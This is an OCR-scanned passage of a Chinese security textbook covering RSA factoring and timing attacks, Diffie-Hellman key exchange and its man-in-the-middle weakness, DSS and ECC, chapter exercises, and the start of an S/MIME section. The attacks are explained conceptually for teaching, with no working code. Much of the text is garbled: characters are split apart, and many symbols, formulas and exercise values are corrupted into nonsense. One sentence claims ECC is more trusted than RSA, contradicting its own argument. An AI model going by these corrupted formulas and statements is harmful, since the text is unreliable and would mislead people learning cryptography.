行 因子 分 解 。 对 RSA-130 的 攻击 使 用 了 称 为 一 般 数 域 (GNFS) 的 新 算法 ， 该 算法 能 够 因子 分 
ELL RSA-129 更 大 的 数 ， 但 计算 代价 仅 是 二 次 筛 法 的 21%。 

对 较 大 密 钥 的 威胁 有 两 方面 : 计算 能 力 的 持续 增长 以 及 因子 分 解 算法 的 不 断 完 善 ， 给 大 密 
钥 的 使 用 造成 威胁 。 我 们 已 了 解 到 ， 更 换 一 种 算法 可 使 速度 显著 增加 。 我 们 期 望 GNFS 还 可 以 
进一步 改进 并 能 设计 出 更 好 的 算法 。 事 实 上 ， 对 某 种 特殊 形式 的 数 ， 用 特殊 数 域 第 (SNFS ) 算 
法 进行 因子 分 解 比 一 般 数 域 筛 要 快 得 多 ， 我 们 可 以 期 望 算法 上 会 有 所 突破 ， 使 一 般 的 因子 分 解 
的 性 能 在 时 间 上 大 约 与 SNFS 一 样 或 者 甚至 比 SNFS 更 快 。 因 此 ， 我 们 在 选择 RSA 的 密 钥 大 
小 时 应 谨慎 小 心 。 在 最 近 一 段 时 间 里 ， 密 钥 取 在 1024 一 2048 位 是 合适 的 。 

际 了 要 指定 n 的 大 小 外 ,研究 者 还 提出 了 其 他 一 些 限制 条 件 。 为 了 防止 可 以 很 容易 地 破解 
n, RSA 算法 的 发 明 者 建议 p 和 9 还 应 满足 下 列 限制 条 件 : 
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1. p FI q 的 长 度 应 仅 相 差 几 位 。 这 样 对 1024 位 (309 十 进 制 位 ) 的 密 钥 而 言 ， p 和 9g 都 应 
在 10” 和 10” 之 间 。 
2. (p-1) 和 (g-1) 都 应 有 一 个 大 的 素 因 子 。 
3. gcd(p-1, q-1) 应 该 较 小 。 
另外 ,已 经 证 明 , #e<nHd<n*, N d IRADE [WIEN90]。 
计时 攻击 ”如 果 你 想 知道 评价 密码 算法 的 安全 性 有 多 难 ， 那 么 计时 攻击 的 出 现 就 是 最 
好 的 例子 。 密 码 学 专家 Paul Kocher 已 证 明 ， 攻 击 者 可 以 通过 计算 解密 消息 所 用 的 时 间 来 
确定 私 钥 [KOCH96]。 计 时 攻击 不 仅 可 以 用 于 攻击 RSA， 而 且 可 以 用 于 攻击 其 他 的 公 钥 密 
码 体 制 。 这 种 攻击 有 两 个 原因 令 人 震惊 : 它 来 自 一 个 完全 意 想 不 到 的 方向 ， 而 且 它 是 一 个 唯 
密 文 攻击 。 
计时 攻击 类 似 于 守 贼 通过 观察 他 人 转动 保险 柜 拨 号 盘 的 时 间 长 短 来 猜测 密码 ， 我 们 可 以 通 
过 RSA 加 密 和 解密 中 的 模 寡 算法 来 说 明 这 种 攻击 ， 但 这 种 攻击 可 以 攻击 任何 运行 时 间 可 变 的 
算法 。 在 这 种 算法 中 ， 模 寡 运 算是 通过 一 位 一 位 来 实现 的 ， 每 次 迭代 执行 一 次 模 乘 运算 ， 但 若 
该 位 为 1， 则 还 需 执 行 一 次 模 乘 运算 。 
正如 Kocher 在 其 论文 中 所 指出 的 ， 在 下 述 极端 情况 下 ， 我 们 很 容易 理解 计时 攻击 的 含义 。 
假定 在 模 徊 算法 中 ， 模 乘 防 数 的 执行 时 间 只 在 几 种 情形 中 比 整个 模 究 运算 的 平均 执行 时 间 要 长 
得 多 ,但 在 大 多 数 情 形 下 其 执行 相当 快 。 计 时 攻击 是 从 最 左 位 b 开始， 一 位 一 位 地 进行 的 。 
假设 攻击 者 已 知 前 面 的 j 位 (为 了 得 到 整个 指数 ,攻击 者 可 以 从 j==0 开始 ， 重复 攻击 直至 
已 知 整个 指数 为 止 )， 则 对 给 定 的 密 文 ， 攻 击 者 可 以 完成 for 循环 的 前 j 次 迭代 ， 其 后 的 操作 依 
赖 于 未 知 的 指数 位 。 若 该 位 为 1， 则 要 执行 4+ (4Xa) mod n。 对 有 些 a 和 4 的 值 ， 模 乘 运 算 
的 执行 速度 异常 慢 ， 假定 攻 击 者 知道 是 哪些 值 。 由 于 位 为 1 时 ， 对 这 些 值 执 行 迭代 的 速度 很 
慢 ， 若 攻击 者 观察 到 解密 算法 的 执行 速度 总 是 很 慢 ， 则 可 以 认为 该 位 为 1 ; 若 攻击 者 多 次 观察 
到 整个 算法 的 执行 都 很 快 ， 则 可 认为 该 位 为 0。 
在 实际 中 ， 模 窜 运 算 的 实现 并 没有 这 样 大 的 时 间 差 异 ， 一 次 迭代 的 执行 时 间 会 超过 整个 算 
法 的 平均 执行 时 间 ， 但 存在 足够 大 的 差异 使 得 计时 攻击 切实 可 行 。 关 于 这 个 问题 的 详细 讨论 ， 
请 参见 [KOCH96]. 
尽管 计时 攻击 会 造成 严重 的 威胁 ;但 是 有 一 些 简单 可 行 的 解决 方法 ， 包 括 : 
e 不 变 的 窘 运算 时 间 : 保证 所 有 的 徊 运算 在 返回 结果 前 执行 时 间 都 相同 。 这 种 方法 虽然 
很 简单 ， 但 会 降低 算法 的 性 能 。 
e 随机 延 时 : 通过 在 求 寡 算法 中 加 入 随机 延 时 来 迷惑 计时 攻击 者 ， 以 提高 性 能 。Kocher 
认为 ， 如 果 不 增 加 足够 的 干扰 ， 那 么 攻击 者 可 以 通过 收集 额外 的 观察 数据 来 抵消 随机 
延 时 ， 仍 然 可 能 攻击 成 功 。 
© fam: 在 执行 客运 算 之 前 先 将 密 文 乘 上 一 个 随机 数 ， 这 一 过 程 可 使 攻击 者 不 知道 计算 
机 正在 处 理 的 是 密 文 的 哪些 位 ， 这 样 可 防止 攻击 者 一 位 一 位 地 进行 分 析 ， 而 这 种 分 析 
正 是 计时 攻击 的 本 质 所 在 。 
RSA 数据 安全 (RSA Data Security) 算法 在 乘积 中 就 使 用 了 隐蔽 方法 ， 它 用 私 钥 实现 操作 
M=C* mod n 在 的 过 程 如 下 : 
1. 产生 O~(n—1) 之 间 秘 密 的 随机 数 。 
2. 计算 C’'=C(r*) modn, HP e 是 公开 的 指数 。 
3. 像 通常 的 RSA 运算 一 样 ， 计 算 M'=(C') mod n。 
4. 计算 M=M'r' modn, Hb r” Æ r Bin HRC. RHE re mod n=r modn, WL 
证 明 结 论 是 正确 的 。 
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RSA 数据 安全 算法 由 于 使 用 了 隐蔽 方法 ， 其 性 能 降低 了 2%~10%. 


21.5 Diffie-Hellman 和 其 他 非 对 称 算法 
21.5.1 Diffie-Hellman 密 钥 交换 


Diffie 和 Hellman 在 一 篇 具有 独创 意义 的 论文 中 首次 提出 了 公 钥 算法 ， 给 出 了 公 钥 密码 学 
的 定义 [DIFF76]， 该 算法 通常 称 为 Diffie-Hellman 密 钥 交换 。 许 多 商业 产品 都 使 用 了 这 种 密 铀 
交换 技术 。 
该 算法 的 目的 是 使 两 个 用 户 能 安全 地 交换 密 钥 ， 以 便 在 后 续 的 通信 中 用 该 密 钥 对 消息 加 
密 。 该 算法 本 身 只 限于 进行 密 钥 交换 。 
Diffie-Hellman 算法 的 有 效 性 建立 在 计算 离散 对 数 是 很 困难 的 这 一 基础 之 上 。 简 单 地 说 ， 
我 们 可 如 下 定义 离散 对 数 。 首 先 定 义 素数 p 的 本 原 根 。 素 数 的 本 原 根 是 一 个 整数 ， 且 其 寡 可 
以 产生 1~p 一 1 之 间 的 所 有 整数 。 也 就 是 说 ， 若 a 是 素数 p 的 本 原 根 ， 则 
amodp,a modp,…,a” mod p 
各 不 相同 ， 它 是 整数 1 ~ p 一 1 的 一 个 序列 。 
对 任意 整数 小 于 p 的 整数 b 和 素数 p 的 本 原 
Ra, 我们 可 以 找到 唯一 的 指数 i， 使 得 : 
b=a'modp ”这 里 0<i<p-l S 
指数 i 称 为 5 的 以 a 为 底 的 模 p 离散 对 数 ， 记 为 A 
dlog., (b) ©. pa 
算法 ”根据 这 个 背景 我 们 定义 Diffie-Hellman | pepe 
密 钥 交换 ， 如 图 21-9 所 示 。 在 这 种 方法 中 ,素数 U 
q 及 其 本 原 根 a 是 两 个 公开 的 整数 。 假 定 用 户 A 
和 用 户 B 希望 交换 密 钥 ， 那 么 用 户 A 选 择 一 个 
EDLE $ X <q, HHR Y=a“% mod qs KU | 
H, FAP B 也 独立 地 选择 一 个 随机 整数 AX <q, , —————— 
并 计算 Y=a% mod q, A 和 B 保 持 其 XY 是 私有 图 21-9 Diffie-Hellman 密 钥 交换 算法 
的 ， 但 对 另 一 方 而 言 ,7 是 公开 可 访问 的 。 用 户 AHA K= (Ys) TFA BHR K= (Yy mod gq。 
这 两 种 计算 所 得 的 结果 是 相同 的 。 
K=(Ys)” mod q 
=(a"8 mod q)™ mod q 
=(a"®)"4 mod q 
=a8"4 mod q 
=(a"4)"8 mod q 
=(a"4 mod q)” mod q 
=(¥4)"® mod q 
至 此 双方 完成 了 密 钥 值 的 交换 。 此 外 ， 由 于 有 和 高 是 私有 的 ， 所 以 攻击 者 只 能 通过 g、 
a、 了 和 Ys 来 进行 攻击 。 这 样 ， 他 就 必须 求 离散 对 数 才 能 确定 密 钥 。 例 如 ， 要 对 用 户 B 的 密 
钥 进 行 攻击 ， 攻 击 者 就 必须 先 计算 : 
Xp= dlogas( Ys) 


日 ”许多 文献 将 离散 对 数 称 为 指标 ,但 是 对 于 这 个 概念 还 没有 统一 的 说 法 ， 这 并 不 是 广泛 接受 的 叫 法 。 





464 RORY FARAH SE 


然后 他 就 可 以 像 用 户 B 那样 计算 出 密 钥 Ko 

Diffie-Hellman 密 钥 交换 的 安全 性 建立 在 下 述 事 实 之 上 : 求 关于 素数 的 模 血 运算 相对 容易 ， 
而 计算 离散 对 数 却 非常 困难 ; 对 于 大 素数 ， 求 离散 对 数 被 认为 是 不 可 行 的 。 

这 里 的 一 个 例子 中 ， 密 钥 交 换 所 使 用 的 素数 gq 二 353 和 它 的 一 个 本 原 根 a 二 3。A 和 B 分 
别 选择 密 钥 X,=97 和 高 二 233， 并 计算 相应 的 公 钥 : 

A 计算 入 二 3” mod 353=40 
` B 计算 Y=3 mod 353= 248 
A 和 B 交换 公 和 钥 后 ， 双 方 均 计 算出 公共 的 密 钥 : 
A 计算 K=(Ys)%mod353 二 248”mod 353= 160 
B it # K= (¥,)” mod 353 二 40” mod 353= 160 
我 们 假定 攻击 者 能 够 得 到 下 列 信息 : 
gq=353, a=3, %=40, Ys=248 

在 这 个 简单 的 例子 中 ， 用 蛮 力 攻击 确定 密 钥 160 是 可 能 的 。 特 别 地 ， 攻 击 者 可 以 通过 寻找 
Fi #8 3° mod 353=40 ak 3° mod 353=248 的 解 来 确定 公共 密 钥 。 蛮 力 攻击 方法 就 是 要 计算 
3 模 353 的 寡 次 ， 当 计算 结果 等 于 40 或 248 时 则 停止 。 因 为 3”mod 353=40, PREX 97 
时 可 得 到 期 望 的 结果 。 

对 于 大 数 ， 上 述 方法 实际 是 不 可 行 的 。 

密 钥 交换 协议 ”图 21-10 给 出 的 简单 协议 使 用 了 Diffie-Hellman 计算 方法 。 假 定 A 希望 与 
B 建立 连接 ， 并 使 用 密 钥 对 该 次 连接 中 的 消息 加 密 。 用 户 A 产生 一 次 性 私 钥 XG, TTR Y, FF 
将 发 送 给 B ; AP B 也 产生 私 钥 各， 计算 Ya， 并 将 Yr 发送 给 A。 这 样 A ALB 都 可 以 计算 
出 密 钥 。 当 然 ， 在 通信 前 A 和 B 都 应 已 知 公 开 的 gqg 和 a， 如 可 由 用 户 A 选择 gq 和 a， 并 将 gq 
和 a 放 人 第 一 条 消息 中 。 

这 是 使 用 Diffie-Hellman 算法 的 男 一 个 例子 。 假 定 有 一 组 用 户 (如 LAN EW PRA HP), 
且 每 个 用 户 都 产生 一 个 在 较 长 时 间 内 有 效 的 私 钥 了 六， 并 计算 公开 的 六。 这 些 公开 值 与 公开 的 q 
和 a 一 起 存放 于 某 中 心目 录 中 ， 在 任意 时 刻 用 户 B 都 可 以 访问 用 户 A 的 公开 值 ， 计 算出 密 钥 ， 
并 用 密 钥 对 消息 加 密 后 发 送 给 A。 知 该 中 心目 录 是 可 信 的 ， 则 这 种 形式 的 通信 既 可 保证 保密 
性 ， 又 可 保证 某 种 程度 的 真实 性 。 因 为 只 有 A 和 B 可 以 确定 密 钥 ， 所 有 其 他 用 户 均 不 能 读 取 
该 消息 (保密 性 ); 接收 方 A 知道 只 有 用 户 B 能 用 该 密 钥 产生 消息 (真实 性 )。 但 是 这 种 方法 不 
能 抗 重 放 攻 击 。 

中 间 人 攻击 ”图 21-10 中 描述 的 协议 对 中 间 人 攻击 并 不 安全 。 假 设 Alice 和 Bob 希望 交换 
A, Darth 是 攻击 者 。 中 间 人 攻击 按 如 下 步骤 进行 : 

1. 为 了 进行 攻击 ，Darth 首先 生成 两 个 随机 的 私 钥 Xo 和 Xb,， 然 后 计算 相应 的 公 和 钥 You A Yms 

2. Alice 向 Bob 发 送 Yio 

3. Darth 截取 Y, JF] Bob 发 送 Ypio Darth 也 计算 K2== (Y, mod gq。 

4. Bob 接收 Ypi, 计算 K1= (Ypy? mod qo 

5. Bob jf] Alice 发 送 Yo. 

6. Darth 截取 Ys FF [A] Alice 发 送 Ymo Darth 计算 K1=(Ys)"”! mod q- 

7. Alice 接收 Yoo, 计算 K2= (Yp) mod gq. 

这 时 ，Bob 和 Alice 认为 他 们 之 间 共 享 一 个 秘密 密 钥 。 但 实际 上 Bob 和 Darth 共享 秘密 密 
钥 K1， 而 Alice 和 Darth 共享 秘密 密 钥 K2。 将 来 ，Bob 和 Alice 之 间 的 所 有 通信 都 以 如 下 的 方 
式 受 到 威胁 : 

1. Alice 发 送 加 密 消息 M : E(K2, M)。 

2. Darth 截获 加 密 的 消息 并 且 解 密 ， 恢 复出 消息 M, 
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Alice 


Alice 和 Bob 共 享 素数 4 和 Alice 和 Bob 共 享 素数 4 和 
a， 满 足 a<g 且 a 是 q 的 一 个 a， 满 足 a<q 且 a 是 gq 的 一 个 
本 原 根 本 原 根 


”Alice 计 算 一 个 公 和 钥 7 = Bob 计 算 一 个 公 钥 7 =a"; 
aX mod q mod q 


























Alice 计 算 共享 的 秘密 密 Bob 计 算 共 享 的 秘密 密 钥 
钥 K=(Y,)* mod q K=(Y )* mod q 


图 21-10 Diffie-Hellman 密 钥 交换 


3. Darth 向 Bob Aik E(K1, M) 或 者 发 送 E(K1, M), XE M' 可 以 是 任意 消息 。 在 第 一 种 
情况 下 ，Darth 只 是 想 偷 听 通 信和 内 容 却 不 算 改 它 。 在 第 二 种 情况 下 ，Darth 想 要 自 改 发 送 给 Bob 
的 消息 。 

对 中 间 人 攻击 ， 这 种 密 钥 交换 协议 比较 脆弱 ， 因 为 它 不 能 认证 参与 者 。 这 种 弱点 可 以 通过 
使 用 数字 签名 或 公 钥 证 书 来 克服 。 本 章 后 面 和 第 2 章 阐述 了 这 个 主题 。 


21.5.2 ”其 他 公 钥 密码 算法 


已 被 商业 接受 的 两 种 其 他 的 公 钥 算法 是 : DSS (数字 签名 标准 ) 和 椭圆 曲线 密码 学 。 

数字 签名 标准 ”美国 国家 标准 与 技术 研究 所 (NIST) 已 经 发 布 了 联邦 信息 处 理 标准 FIPS 
186-4 (数字 签名 标准 ，2013 年 7 月 )。DSS 使 用 了 SHA-1， 并 且 提 出 了 一 种 新 的 数字 签名 
技术 ， 即 数字 签名 算法 (DSA). DSS 最 初 在 1991 年 提出 。 在 公众 对 该 安全 方案 反馈 的 基础 上 ， 
1993 年 对 其 进行 了 修订 。1996 年 又 进一步 做 了 微小 修订 。DSS 使 用 了 一 种 专 为 数字 签名 功能 
而 设计 的 算法 。 与 RSA 不 同 ， 它 不 能 用 来 加 密 或 者 进行 密 钥 交换 。 

椭圆 曲线 密码 学 ”大 多 数 使 用 公 钥 密码 学 进行 加 密 和 数字 签名 的 产品 和 标准 都 使 用 RSA 
算法 。 最 近 这 些 年 来 密 钥 的 位 数 一 直 在 增加 ， 这 对 RSA 的 应 用 是 很 大 的 负担 ， 对 进行 大 量 安 
全 交易 的 电子 商务 更 是 如 此 。 近 来 ， 出 现 的 一 种 具有 强大 竞争 力 的 椭圆 曲线 密码 学 (ECC) 对 
RSA 提出 了 挑战 。 在 标准 化 过 程 中 ， 如 关于 公 钥 密码 学 的 IEEE P1363 标准 中 ， 人 们 也 已 考虑 
了 ECC. FIPS 186-4 中 包含 用 于 数字 签名 的 ECC 版 本 作为 选项 。 

与 RSA FALL, ECC 的 主要 诱 人 之 处 在 于 ， 它 可 以 使 用 比 RSA 短 得 多 的 密 钥 得 到 相同 的 
安全 性 ， 因 此 可 以 减少 处 理 负 担 。 另 一 方面 ， 虽 然 关 于 ECC 的 理论 已 经 很 成 熟 ， 但 直到 最 
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近 才 出 现 这 方面 的 产品 ， 对 ECC 的 密码 分 析 也 刚刚 起 步 ， 因 此 ECC 的 可 信和 度 比 RSA 高 。 
ECC HE RSA 或 Diffie-Hellman E HEIR, XT ECC 完整 的 数学 描述 已 超出 了 本 书 的 范 
Fal, ECC 技术 的 基础 是 使 用 了 称 为 椭圆 曲线 数学 结构 的 理论 。 


21.6 关键 术语 、 复 习题 和 习题 


关键 术语 

‘Diffie-Hellman key exchange (Diffie-Hellman 密 钥 交换 ) private key ( 私 钥 ) 

digital signature (数字 签名 ) public key ( 公 钥 ) 

Digital Signature Standard (DSS， 数 字 签 名 标准 ) public-key certificate ( 公 钼 认证 ) 
Elliptic-Curve Cryptography(ECC, WAHRE) public-key encryption 〈 公 钥 加 密 ) 

key exchange( 密 钥 交 换 ) secret key (秘密 密 钥 ) 

message authentication (消息 认证 ) Secure Hash Algorithm (SHA， 安 全 散 列 算法 ) 
Message Authentication Code (MAC， 消 息 认 证 码 ) secure hash function (安全 散 列 函数 ) 
message digest (消息 摘要 ) strong collision resistance ( 强 抗 碰撞 性 ) 
one-way hash function ( 单 向 散 列 函数 ) weak collision resistance ( 弱 抗 碰撞 性 ) 
复习 题 


21.1 散 列 函数 中 ， 压 缩 函 数 是 什么 ? 

21.2 SHA 中 使 用 的 基本 算术 和 逻辑 果 数 是 什么 ? 

21.3 ”为 了 用 一 个 散 列 函数 替代 另 一 个 散 列 函数 ，HMAC 中 需要 进行 哪些 改变 ? 
21.4 什么 是 单身 图 数 ? 

21.5 简要 说 明 一 下 Diffie-Hellman 密 钥 交换 。 


习题 


21.1 考虑 一 个 32 位 的 散 列 函数 ， 它 是 两 个 16 位 函数 XOR 或 RXOR 的 连接 ，XOR 和 RXOR 是 21.2 节 
所 定义 的 “两 个 简单 的 散 列 函数 ”。 
a. 该 校 验 和 能 否 检 测 出 由 奇数 位 错 所 引起 的 错误 ?请 说 明 原 因 。 
b. 该 校 验 和 能 和 否 检测 出 由 偶数 位 错 所 引起 的 错误 ? 若 不 能 ， 请 说 明 该 校 验 和 所 不 能 检测 出 的 错误 
类 型 的 特征 。 
c. 略 该 明 数 作为 消息 认证 中 的 散 列 函数 ， 试 分 析 其 效率 。 
21.2 a. 考 虑 下 面 的 散 列 函数 。 消 息 是 一 列 十 进 制 数字 : M=(a, an, a). MPR HE RANI n, 


计算 散 列 值 h: (x (a) mod n。 该 散 列 值 能 满足 2.2 节 列 出 的 关于 散 列 函数 的 一 些 要 求 吗 ?请 解释 
b. HEI AA ify (ay’) mod n， 重 做 (a). 


c. 4 M=(189, 632, 900, 722, 349) 和 n= 二 989 时 ， 计 算 (b) AYA PRR. 
21.3 ”利用 散 列 函数 可 以 构造 类 似 于 DES 结构 的 分 组 密码 。 因 为 散 列 函 数 是 单 向 的 并 且 分 组 密码 必须 可 
逆 (为 了 解密 )， 请 问 为 什么 可 以 构造 类 似 于 DES 结构 的 分 组 密码 ? 
21.4 考虑 相反 的 问题 : 利用 加 密 算 法 构造 单 向 散 列 函数 。 考 虑 使 用 有 一 个 已 知 密 钥 的 RSA 算法 。 如 下 
处 理 含 有 若干 分 组 的 消息 : 加 密 第 一 个 分 组 ， 将 加 密 结果 与 第 二 个 分 组 异 或 并 加 密 之 ， 等 等 。 说 
明 在 解决 下 面 的 问题 时 该 方法 是 不 安全 的 。 给 定 两 个 分 组 消息 B1 、82， 其 散 列 码 为 : 
RSAH(B1, B2)=RSA(RSA(B1) ® B2) 


21.5 


21.9 
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给 定 一 个 分 组 C1， 选 择 C2 使 得 RSAH(C1, C2)=RASH(B1, B2)。 因 此 ， 散 列 函 数 不 满足 弱 抗 碰 
撞 性 。 


图 21-11 表示 了 一 个 HMAC 的 一 种 选择 性 Rit ART SINT 

实现 方案 。 K* ipad 

a. 描述 该 实现 方案 的 操作 。 

b. 该 实现 方案 比 图 214 所 示 的 有 什么 biù b fit b iv. | 


优势 ? 

用 图 21-8 所 示 的 RSA 算法 对 下 列 数据 实 

现 加 密 和 解密 : 

a. p=3; q=11, e=7; M=5 

b. p=5; q=11, e=3; M=9 

c. p=7; gq= 11, e=17; M=8 

d. p=11; g=13, e=11; M=7 

e. p=17; q=31, e=7; M=2 

提示 : 解密 并 不 像 你 想象 的 那么 难 ; 注意 
使 用 一 些 技巧 。 m 

在 使 用 RSA 的 公 钥 体制 中 ， 已 截获 发 给 某 

用 户 的 密 文 C=10, HH PWIA e=S5, 

n 二 35， 那 么 明文 M 等 于 多 少 ? 

在 RSA 体制 中 ， 某 给 定 用 户 的 公 钥 e= 

31, nn 三 3599， 那 么 该 用 户 的 私 钥 等 于 多 少 ? 

(BOE FR AA FA RSA 算法 编码 的 分 组 但 不 知 私 钥 ， 假 设 n 二 pg, e ESH BRASH 

说 他 知道 其 中 有 一 个 明文 分 组 与 n 有 公 因 子 ， 这 对 我 们 有 帮助 吗 ? 








C] HMAC(K, M) 


31-11 HMAC 的 另 一 种 实现 方式 


21.10 考虑 下 列 方法 : 


21.11 


l-12 


1. 挑选 一 个 奇数 E, 

2. 挑选 两 个 素数 PP 和 QO， 其 中 (P 一 1)(0 一 1) 一 1 是 的 偶数 倍 。 

3. P Fil O 相 乘 得 到 N。 

a i p= 

这 个 方法 与 RSA 等 价 吗 ? 解释 之 。 

假设 Bob 使 用 模 很 大 的 RSA 加 密 系 统 。 该 模 值 在 合理 的 时 间 内 不 能 进行 因子 分 解 。 假 设 Alice 
给 Bob 发 送 一 条 把 每 个 字母 对 应 成 0 一 25 之 间 整 数 (A> 0, =, Z 一 25) 的 消息 ， 然 后 使 用 具 
有 大 的 e、n 值 的 RSA 分 别 加 密 每 个 数 。 这 种 方法 安全 吗 ? 如 果 不 安全 ， 给 出 对 这 种 加 密 方案 最 
有 效 的 攻击 。 

考虑 公共 素数 g=11 和 本 原 根 a 二 2 的 Diffie-Hellman 方案 。 

a. 如 果 用 户 A 有 公 钥 = 二 9， 请 问 A 的 私 钥 XY 是 什么 ? 

b. 如 果 用 户 B 有 公 钥 Ye=3, 请问 共 享 的 秘密 密 钥 KK 是 什么 ? 
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Internet 安全 协议 和 标准 


学 习 目标 

学 习 完 本 章 之 后 ， 你 应 该 能 够 : 

© 概述 MIME; 

© 理解 S/MIME 的 功能 及 其 面临 的 安全 威胁 ; 


o 解释 SSL 的 关键 组 件 ; 
讨论 HTTPS 的 应 用 ; 
概述 IPSec; 
讨论 封装 安全 载荷 的 格式 和 功能 。 





本 章 主 要 介绍 一 些 广泛 使 用 的 重要 Internet 安全 协议 和 标准 。 


22.1 安全 E-mail 和 S/MIME 


安全 /多 用 途 Internet 邮件 扩展 ( Secure/Multipurpose Internet Mail Extension, S/MIME) 是 
对 Internet 电子 邮件 (Internet E-mail) 格式 标准 MIME 的 安全 性 的 增强 。 


22.1.1 MIME 


多 用 途 Internet 邮件 扩展 ( MIME) 是 对 Internet 电子 邮件 格式 的 旧 的 RFC 822 规范 的 扩 
fe. RFC 822 定义 了 一 个 简单 报头 ， 包括 到 哪里 (To)、 来 自 哪 里 (From)、 主 题 (Subject) 以 
及 一 些 其 他 的 域 ， 这些 能 够 用 于 通过 Internet AIK E-mail 消息 ， 同 时 也 提供 了 E-mail 内 容 的 基 
本 信息 。RFC 822 中 规定 内 容 采 用 简单 的 ASCII 文本 格式 。 

MIME 提供 一 些 新 的 报头 域 ， 这 些 域 定 义 了 消息 正文 (或 称 主体 ) (body of the message) 有 
关 的 信息 ， 包 括 正文 的 格式 和 便于 转化 的 任何 编码 形式 。 最 重要 的 是 ，MIME 定义 了 一 些 内 容 
格式 ， 用 于 支持 多 媒体 E-mail 进行 标准 化 表示 ， 比 如 包括 文本 、 图 像 、 音 频 、 视 频 等 。 


22.1.2 S/MIME 


S/MIME 是 定义 在 很 多 文档 中 的 一 个 复杂 的 功能 。 与 S/MIME 最 为 相关 的 重要 文档 如 下 : 

è RFC 5750 (S/MIME 版 本 3.2 证书 处 理 ，2010 年 )， 指定 了 X.509 JEB (S/MIME) 版 
本 3.2 使 用 的 相关 约定 。 

è RFC 5751 ( S/MIME 版 本 3.2 消息 规范 ，2010 年 ) :S/MIME 消息 创建 和 处 理 的 主要 定 
义 文档 。 

è RFC 4134 (S/MIME 消息 样 例 ，2005 年 ): 给 出 使 用 S/MIME 的 消息 体格 式 的 样 例 。 

è RFC 2634 (S/MIME 增强 的 安全 服务 ，1999 年 ) : 描述 了 S/MIME 的 4 个 可 选 安 全 服务 
扩展 。 

@ RFC 5652 (加 密 消 息 语 法 (Cryptographic Message Syntax, CMS), 20094F): 加 密 消 息 
语法 被 用 于 数字 签名 、 摘 要 、 认 证 或 加 密 任 意 消息 内 容 。 

© RFC 3370 (CMS 算法 ，2002 F): 介绍 在 CMS 中 使 用 多 种 加 密 算法 的 约定 。 
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è RFC 5752 (CMS 中 的 多 重 签名 (multiple signature), 2010 年 ): 描述 消息 使 用 多 重 、 并 行 签名 。 

è RFC 1847 (MIME 的 安全 性 部 分 ( Security Multiparts) ——Multipart/Signed 与 
Multipart/Encrypted, 1995 年 ): 定义 了 一 个 安全 服务 可 应 用 于 MIME 正文 部 分 的 框架 。 
数字 签名 的 使 用 与 S/MIME 相关 ， 如 随后 所 解释 的 。 

S/MIME 是 作为 一 个 附加 的 MIME 的 内 容 类 型 ( 见 表 22-1) 的 集合 而 定义 的 ， 其 提供 了 签 

名 或 加 密 E-mail 消息 的 能 力 。 本 质 上 ， 这 些 内 容 类 型 支持 4 种 新 的 功能 : 

o 封装 数据 (enveloped data): 它 由 各 种 类 型 的 加 密 内 容 和 接收 方 用 于 加 密 内 容 的 一 个 或 
多 个 密 钥 组 成 。 

e 签名 数据 (signed data): 数字 签名 通过 提取 要 签名 内 容 的 消息 摘要 ， 并 用 签名 者 的 私 钥 
加 密 得 到 。 然 后 ， 用 base64 编码 方法 重新 对 内 容 和 签名 编码 。 因 此 ， 一 个 经 过 签名 的 
数据 消息 只 能 被 具有 S/MIME 功能 的 接收 方 处 理 。 

e 透明 签名 数据 ( clear-signed data): 和 签名 的 数据 一 样 ， 其 形成 了 内 容 的 数字 签名 。 但 
在 这 种 情况 下 ， 只 有 数字 签名 采用 了 base64 编码 。 因 此 ， 没 有 S/MIME 功能 的 接收 方 
虽然 无 法 验证 签名 ， 但 却 可 以 看 到 消息 内 容 。 

© 签名 并 封装 数据 (signed and enveloped data): 仅 签 名 实体 和 仅 加 密实 体 是 可 以 艇 套 的 ， 
以 使 对 加 密 后 的 数据 可 以 签名 ， 对 签名 数据 和 透明 签名 数据 可 以 进行 加 密 。 


表 22-1 S/MIME 内 容 类 型 


nth SME E 
Application 仅 包含 公 钥 证 书 的 实体 
multipart/signed 消息 中 签名 子 部 分 的 内 容 类 型 


图 22-1 给 出 了 S/MIME 功能 流 的 总 体 概览 。 


BMT AA 






一 次 性 会 话 密 钥 


RIETI FLSH 


a) 发 送 方 签名 并 加 密 消息 
图 22-1 简化 的 S/MIME 功能 流 
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接收 方 私 钥 


REHASH 
由 发 送 方 生成 的 私 钥 





b ) 接收 方 解 密 消 息 ， 并 验证 发 送 方 的 签名 
图 22-1 ( 续 ) 


签名 和 透明 签名 数据 用 于 签署 S/MIME 消息 的 首选 算法 是 对 一 个 SHA-256 消息 散 列 使 
用 RSA 或 数字 签名 算法 (DSA) 签名。 工作 过 程 如 下 : 首先 ， 用 SHA-256 把 要 发 送 的 消息 映 
射 成 256 位 固定 长 度 的 编码 。 对 于 所 有 的 实际 应 用 ， 这 256 位 的 消息 摘要 对 这 个 消息 是 唯一 
的 。 有 人 要 更 改 消息 或 用 另 一 个 消息 来 代替 ， 并 仍然 具有 相同 的 摘要 ， 这 几乎 是 不 可 能 的 。 然 
Ja, S/MIME 利用 RSA 和 发 送 方 的 RSA 私 钥 来 加 密 这 个 摘要 。 这 样 就 得 到 了 数字 签名 ， 将 其 
附加 到 消息 上 ， 正 如 第 2 章 所 讨论 的 。 现 在 ， 无 论 是 谁 得 到 了 该 消息 都 可 以 重新 计算 消息 摘 
要 ， 然 后 用 RSA 和 发 送 方 的 RSA 公 钥 解密 签名 。 如 果 消 息 中 的 消息 摘要 和 计算 出 的 消息 摘要 
匹配 ， 那 么 数字 签名 就 是 有 效 的 。 由 于 这 种 操作 仅 包 括 加 密 和 解密 一 个 256 位 的 块 ， 因 此 只 花 
费 很 少 的 时 间 。DSA 可 以 用 作 RSA 的 替代 签名 算法 。 

签名 是 一 个 二 进 制 的 字符 串 ， 通 过 Internet 电子 邮件 发 送 它 可 能 会 导致 莫名 的 内 容 的 改 
变 ， 因 为 一 些 电 子 邮 件 软件 将 会 试图 通过 寻找 像 换 行 这 样 的 控制 字符 来 解释 消息 的 内 容 。 
为 了 保护 数据 ， 签 名 或 附加 消息 的 签名 被 radix-64 或 base64 映射 规则 映射 为 ASCII 字符 。 
radix-64 把 输入 的 每 三 个 八 位 组 的 二 进 制 数据 映射 为 4 个 ASCII 字符 ( 见 附录 G)。 

封装 数据 ”用 于 加 密 S/MIME 消息 的 默认 算法 是 AES MRSA, Ft, S/MIME 产生 一 个 
伪 随 机 密 钥 ， 这 个 密 钥 用 于 使 用 AES 或 者 一 些 常规 加 密 方案 对 消息 进行 加 密 (如 3DES)。 在 
